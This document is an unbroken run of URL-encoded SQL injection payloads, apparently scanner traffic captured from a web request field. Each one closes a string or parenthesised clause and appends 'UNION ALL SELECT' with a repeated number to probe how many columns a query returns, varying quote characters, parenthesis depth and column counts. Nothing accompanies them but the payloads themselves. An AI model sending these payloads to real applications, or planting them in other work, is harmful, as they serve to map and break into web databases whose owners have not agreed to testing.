-7253%27%29%29%29%20UNION%20ALL%20SELECT%206990%2C6990%2C6990%2C6990%2C6990%2C6990%2C6990%2C6990%2C6990%2C6990%2C6990%2C6990%2C6990%2C6990%2C6990%2C6990%2C6990%2C6990%2C6990%2C6990%2C6990%23 -9664%27%29%29%29%20UNION%20ALL%20SELECT%207723%2C7723%2C7723%2C7723%2C7723%2C7723%2C7723%2C7723%2C7723%2C7723%2C7723%2C7723%2C7723%2C7723%2C7723%2C7723%2C7723%2C7723%2C7723%2C7723%2C7723%2C7723%23 -3528%27%29%29%29%20UNION%20ALL%20SELECT%201246%2C1246%2C1246%2C1246%2C1246%2C1246%2C1246%2C1246%2C1246%2C1246%2C1246%2C1246%2C1246%2C1246%2C1246%2C1246%2C1246%2C1246%2C1246%2C1246%2C1246%2C1246%2C1246%23 -7481%27%29%29%29%20UNION%20ALL%20SELECT%203084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%23 -9786%27%29%29%29%20UNION%20ALL%20SELECT%205873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%23 -6005%27%29%29%29%20UNION%20ALL%20SELECT%203904%2C3904%2C3904%2C3904%2C3904%2C3904%2C3904%2C3904%2C3904%2C3904%2C3904%2C3904%2C3904%2C3904%2C3904%2C3904%2C3904%2C3904%2C3904%2C3904%2C3904%2C3904%2C3904%2C3904%2C3904%2C3904%23 -1364%27%29%29%29%20UNION%20ALL%20SELECT%205336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%23 -8959%27%29%29%29%20UNION%20ALL%20SELECT%202381%2C2381%2C2381%2C2381%2C2381%2C2381%2C2381%2C2381%2C2381%2C2381%2C2381%2C2381%2C2381%2C2381%2C2381%2C2381%2C2381%2C2381%2C2381%2C2381%2C2381%2C2381%2C2381%2C2381%2C2381%2C2381%2C2381%2C2381%23 -1269%27%29%29%29%20UNION%20ALL%20SELECT%201051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%23 -6938%27%29%29%29%20UNION%20ALL%20SELECT%208585%2C8585%2C8585%2C8585%2C8585%2C8585%2C8585%2C8585%2C8585%2C8585%2C8585%2C8585%2C8585%2C8585%2C8585%2C8585%2C8585%2C8585%2C8585%2C8585%2C8585%2C8585%2C8585%2C8585%2C8585%2C8585%2C8585%2C8585%2C8585%2C8585%23 -9587%27%20UNION%20ALL%20SELECT%202807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%23 -3007%27%20UNION%20ALL%20SELECT%201310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%23 -3159%27%20UNION%20ALL%20SELECT%204888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%23 -4381%27%20UNION%20ALL%20SELECT%201374%2C1374%2C1374%2C1374%2C1374%2C1374%2C1374%2C1374%2C1374%2C1374%2C1374%2C1374%2C1374%2C1374%2C1374%2C1374%2C1374%2C1374%2C1374%2C1374%2C1374%2C1374%2C1374%2C1374%23 -6749%27%20UNION%20ALL%20SELECT%203408%2C3408%2C3408%2C3408%2C3408%2C3408%2C3408%2C3408%2C3408%2C3408%2C3408%2C3408%2C3408%2C3408%2C3408%2C3408%2C3408%2C3408%2C3408%2C3408%2C3408%2C3408%2C3408%2C3408%2C3408%23 -4671%27%20UNION%20ALL%20SELECT%202766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%23 -7079%27%20UNION%20ALL%20SELECT%205766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%23 -6370%27%20UNION%20ALL%20SELECT%208557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%23 -6392%27%20UNION%20ALL%20SELECT%205680%2C5680%2C5680%2C5680%2C5680%2C5680%2C5680%2C5680%2C5680%2C5680%2C5680%2C5680%2C5680%2C5680%2C5680%2C5680%2C5680%2C5680%2C5680%2C5680%2C5680%2C5680%2C5680%2C5680%2C5680%2C5680%2C5680%2C5680%2C5680%23 -7662%27%20UNION%20ALL%20SELECT%207994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%23 -3720%27%29%20UNION%20ALL%20SELECT%203293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%23 -6980%27%29%20UNION%20ALL%20SELECT%206767%2C6767%2C6767%2C6767%2C6767%2C6767%2C6767%2C6767%2C6767%2C6767%2C6767%2C6767%2C6767%2C6767%2C6767%2C6767%2C6767%2C6767%2C6767%2C6767%2C6767%2C6767%23 -5358%27%29%20UNION%20ALL%20SELECT%208229%2C8229%2C8229%2C8229%2C8229%2C8229%2C8229%2C8229%2C8229%2C8229%2C8229%2C8229%2C8229%2C8229%2C8229%2C8229%2C8229%2C8229%2C8229%2C8229%2C8229%2C8229%2C8229%23 -1550%27%29%20UNION%20ALL%20SELECT%201520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%23 -3323%27%29%20UNION%20ALL%20SELECT%201156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%23 -3913%27%29%20UNION%20ALL%20SELECT%206505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%23 -3789%27%29%20UNION%20ALL%20SELECT%204540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%23 -6810%27%29%20UNION%20ALL%20SELECT%207682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%23 -7443%27%29%20UNION%20ALL%20SELECT%205018%2C5018%2C5018%2C5018%2C5018%2C5018%2C5018%2C5018%2C5018%2C5018%2C5018%2C5018%2C5018%2C5018%2C5018%2C5018%2C5018%2C5018%2C5018%2C5018%2C5018%2C5018%2C5018%2C5018%2C5018%2C5018%2C5018%2C5018%2C5018%23 -8296%27%29%20UNION%20ALL%20SELECT%204356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%23 -6126%27%29%29%20UNION%20ALL%20SELECT%207887%2C7887%2C7887%2C7887%2C7887%2C7887%2C7887%2C7887%2C7887%2C7887%2C7887%2C7887%2C7887%2C7887%2C7887%2C7887%2C7887%2C7887%2C7887%2C7887%2C7887%23 -5250%27%29%29%20UNION%20ALL%20SELECT%208561%2C8561%2C8561%2C8561%2C8561%2C8561%2C8561%2C8561%2C8561%2C8561%2C8561%2C8561%2C8561%2C8561%2C8561%2C8561%2C8561%2C8561%2C8561%2C8561%2C8561%2C8561%23 -1885%27%29%29%20UNION%20ALL%20SELECT%202711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%23 -2843%27%29%29%20UNION%20ALL%20SELECT%208113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%23 -8455%27%29%29%20UNION%20ALL%20SELECT%203425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%23 -1408%27%29%29%20UNION%20ALL%20SELECT%205919%2C5919%2C5919%2C5919%2C5919%2C5919%2C5919%2C5919%2C5919%2C5919%2C5919%2C5919%2C5919%2C5919%2C5919%2C5919%2C5919%2C5919%2C5919%2C5919%2C5919%2C5919%2C5919%2C5919%2C5919%2C5919%23 -7891%27%29%29%20UNION%20ALL%20SELECT%209801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%23 -5435%27%29%29%20UNION%20ALL%20SELECT%202521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%23 -9582%27%29%29%20UNION%20ALL%20SELECT%207213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%23 -5382%27%29%29%20UNION%20ALL%20SELECT%203800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%23 -4194%27%29%29%29%20UNION%20ALL%20SELECT%209141%2C9141%2C9141%2C9141%2C9141%2C9141%2C9141%2C9141%2C9141%2C9141%2C9141%2C9141%2C9141%2C9141%2C9141%2C9141%2C9141%2C9141%2C9141%2C9141%2C9141%23 -5763%27%29%29%29%20UNION%20ALL%20SELECT%204655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%23 -9197%27%29%29%29%20UNION%20ALL%20SELECT%205441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%23 -2914%27%29%29%29%20UNION%20ALL%20SELECT%205666%2C5666%2C5666%2C5666%2C5666%2C5666%2C5666%2C5666%2C5666%2C5666%2C5666%2C5666%2C5666%2C5666%2C5666%2C5666%2C5666%2C5666%2C5666%2C5666%2C5666%2C5666%2C5666%2C5666%23 -3846%27%29%29%29%20UNION%20ALL%20SELECT%203887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%23 -2779%27%29%29%29%20UNION%20ALL%20SELECT%209885%2C9885%2C9885%2C9885%2C9885%2C9885%2C9885%2C9885%2C9885%2C9885%2C9885%2C9885%2C9885%2C9885%2C9885%2C9885%2C9885%2C9885%2C9885%2C9885%2C9885%2C9885%2C9885%2C9885%2C9885%2C9885%23 -5811%27%29%29%29%20UNION%20ALL%20SELECT%205083%2C5083%2C5083%2C5083%2C5083%2C5083%2C5083%2C5083%2C5083%2C5083%2C5083%2C5083%2C5083%2C5083%2C5083%2C5083%2C5083%2C5083%2C5083%2C5083%2C5083%2C5083%2C5083%2C5083%2C5083%2C5083%2C5083%23 -9127%27%29%29%29%20UNION%20ALL%20SELECT%209179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%23 -1023%27%29%29%29%20UNION%20ALL%20SELECT%203471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%23 -9450%27%29%29%29%20UNION%20ALL%20SELECT%205425%2C5425%2C5425%2C5425%2C5425%2C5425%2C5425%2C5425%2C5425%2C5425%2C5425%2C5425%2C5425%2C5425%2C5425%2C5425%2C5425%2C5425%2C5425%2C5425%2C5425%2C5425%2C5425%2C5425%2C5425%2C5425%2C5425%2C5425%2C5425%2C5425%23 -2960%27%20UNION%20ALL%20SELECT%202656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%23 -8777%27%20UNION%20ALL%20SELECT%202716%2C2716%2C2716%2C2716%2C2716%2C2716%2C2716%2C2716%2C2716%2C2716%2C2716%2C2716%2C2716%2C2716%2C2716%2C2716%2C2716%2C2716%2C2716%2C2716%2C2716%2C2716%23 -1543%27%20UNION%20ALL%20SELECT%208225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%23 -9731%27%20UNION%20ALL%20SELECT%206772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%23 -7445%27%20UNION%20ALL%20SELECT%203638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%23 -9749%27%20UNION%20ALL%20SELECT%204219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%23 -6202%27%20UNION%20ALL%20SELECT%205089%2C5089%2C5089%2C5089%2C5089%2C5089%2C5089%2C5089%2C5089%2C5089%2C5089%2C5089%2C5089%2C5089%2C5089%2C5089%2C5089%2C5089%2C5089%2C5089%2C5089%2C5089%2C5089%2C5089%2C5089%2C5089%2C5089%23 -3561%27%20UNION%20ALL%20SELECT%208938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%23 -7734%27%20UNION%20ALL%20SELECT%205554%2C5554%2C5554%2C5554%2C5554%2C5554%2C5554%2C5554%2C5554%2C5554%2C5554%2C5554%2C5554%2C5554%2C5554%2C5554%2C5554%2C5554%2C5554%2C5554%2C5554%2C5554%2C5554%2C5554%2C5554%2C5554%2C5554%2C5554%2C5554%23 -3310%27%20UNION%20ALL%20SELECT%204667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%23 -2534%22%29%20UNION%20ALL%20SELECT%206515%2C6515%2C6515%2C6515%2C6515%2C6515%2C6515%2C6515%2C6515%2C6515%2C6515%2C6515%2C6515%2C6515%2C6515%2C6515%2C6515%2C6515%2C6515%2C6515%2C6515%23 -9612%22%29%20UNION%20ALL%20SELECT%203869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%23 -3060%22%29%20UNION%20ALL%20SELECT%209203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%23 -3940%22%29%20UNION%20ALL%20SELECT%204037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%23 -5504%22%29%20UNION%20ALL%20SELECT%206625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%23 -2469%22%29%20UNION%20ALL%20SELECT%207411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%23 -6910%22%29%20UNION%20ALL%20SELECT%201073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%23 -3669%22%29%20UNION%20ALL%20SELECT%204128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%23 -2639%22%29%20UNION%20ALL%20SELECT%203558%2C3558%2C3558%2C3558%2C3558%2C3558%2C3558%2C3558%2C3558%2C3558%2C3558%2C3558%2C3558%2C3558%2C3558%2C3558%2C3558%2C3558%2C3558%2C3558%2C3558%2C3558%2C3558%2C3558%2C3558%2C3558%2C3558%2C3558%2C3558%23 -9793%22%29%20UNION%20ALL%20SELECT%209685%2C9685%2C9685%2C9685%2C9685%2C9685%2C9685%2C9685%2C9685%2C9685%2C9685%2C9685%2C9685%2C9685%2C9685%2C9685%2C9685%2C9685%2C9685%2C9685%2C9685%2C9685%2C9685%2C9685%2C9685%2C9685%2C9685%2C9685%2C9685%2C9685%23 -9836%22%29%29%20UNION%20ALL%20SELECT%201622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%23 -4102%22%29%29%20UNION%20ALL%20SELECT%202502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%23 -2223%22%29%29%20UNION%20ALL%20SELECT%201901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%23 -5519%22%29%29%20UNION%20ALL%20SELECT%208100%2C8100%2C8100%2C8100%2C8100%2C8100%2C8100%2C8100%2C8100%2C8100%2C8100%2C8100%2C8100%2C8100%2C8100%2C8100%2C8100%2C8100%2C8100%2C8100%2C8100%2C8100%2C8100%2C8100%23 -9034%22%29%29%20UNION%20ALL%20SELECT%205475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%23 -7420%22%29%29%20UNION%20ALL%20SELECT%207597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%23 -6187%22%29%29%20UNION%20ALL%20SELECT%209092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%23 -4972%22%29%29%20UNION%20ALL%20SELECT%201583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%23 -9220%22%29%29%20UNION%20ALL%20SELECT%202623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%23 -4173%22%29%29%20UNION%20ALL%20SELECT%206705%2C6705%2C6705%2C6705%2C6705%2C6705%2C6705%2C6705%2C6705%2C6705%2C6705%2C6705%2C6705%2C6705%2C6705%2C6705%2C6705%2C6705%2C6705%2C6705%2C6705%2C6705%2C6705%2C6705%2C6705%2C6705%2C6705%2C6705%2C6705%2C6705%23 -2479%22%29%29%29%20UNION%20ALL%20SELECT%209638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%23 -3827%22%29%29%29%20UNION%20ALL%20SELECT%209832%2C9832%2C9832%2C9832%2C9832%2C9832%2C9832%2C9832%2C9832%2C9832%2C9832%2C9832%2C9832%2C9832%2C9832%2C9832%2C9832%2C9832%2C9832%2C9832%2C9832%2C9832%23 -9053%22%29%29%29%20UNION%20ALL%20SELECT%204269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%23 -7295%22%29%29%29%20UNION%20ALL%20SELECT%204708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%23 -4439%22%29%29%29%20UNION%20ALL%20SELECT%202208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%23 -7230%22%29%29%29%20UNION%20ALL%20SELECT%205944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%23 -1759%22%29%29%29%20UNION%20ALL%20SELECT%209175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%23 -4445%22%29%29%29%20UNION%20ALL%20SELECT%203355%2C3355%2C3355%2C3355%2C3355%2C3355%2C3355%2C3355%2C3355%2C3355%2C3355%2C3355%2C3355%2C3355%2C3355%2C3355%2C3355%2C3355%2C3355%2C3355%2C3355%2C3355%2C3355%2C3355%2C3355%2C3355%2C3355%2C3355%23 -6419%22%29%29%29%20UNION%20ALL%20SELECT%205763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%23 -4575%22%29%29%29%20UNION%20ALL%20SELECT%205013%2C5013%2C5013%2C5013%2C5013%2C5013%2C5013%2C5013%2C5013%2C5013%2C5013%2C5013%2C5013%2C5013%2C5013%2C5013%2C5013%2C5013%2C5013%2C5013%2C5013%2C5013%2C5013%2C5013%2C5013%2C5013%2C5013%2C5013%2C5013%2C5013%23 -7001%22%20UNION%20ALL%20SELECT%203182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%23 -7384%22%20UNION%20ALL%20SELECT%202083%2C2083%2C2083%2C2083%2C2083%2C2083%2C2083%2C2083%2C2083%2C2083%2C2083%2C2083%2C2083%2C2083%2C2083%2C2083%2C2083%2C2083%2C2083%2C2083%2C2083%2C2083%23 -8255%22%20UNION%20ALL%20SELECT%204069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%23 -2419%22%20UNION%20ALL%20SELECT%208092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%23 -6035%22%20UNION%20ALL%20SELECT%208851%2C8851%2C8851%2C8851%2C8851%2C8851%2C8851%2C8851%2C8851%2C8851%2C8851%2C8851%2C8851%2C8851%2C8851%2C8851%2C8851%2C8851%2C8851%2C8851%2C8851%2C8851%2C8851%2C8851%2C8851%23 -7932%22%20UNION%20ALL%20SELECT%202293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%23 -6046%22%20UNION%20ALL%20SELECT%203720%2C3720%2C3720%2C3720%2C3720%2C3720%2C3720%2C3720%2C3720%2C3720%2C3720%2C3720%2C3720%2C3720%2C3720%2C3720%2C3720%2C3720%2C3720%2C3720%2C3720%2C3720%2C3720%2C3720%2C3720%2C3720%2C3720%23 -4819%22%20UNION%20ALL%20SELECT%205188%2C5188%2C5188%2C5188%2C5188%2C5188%2C5188%2C5188%2C5188%2C5188%2C5188%2C5188%2C5188%2C5188%2C5188%2C5188%2C5188%2C5188%2C5188%2C5188%2C5188%2C5188%2C5188%2C5188%2C5188%2C5188%2C5188%2C5188%23 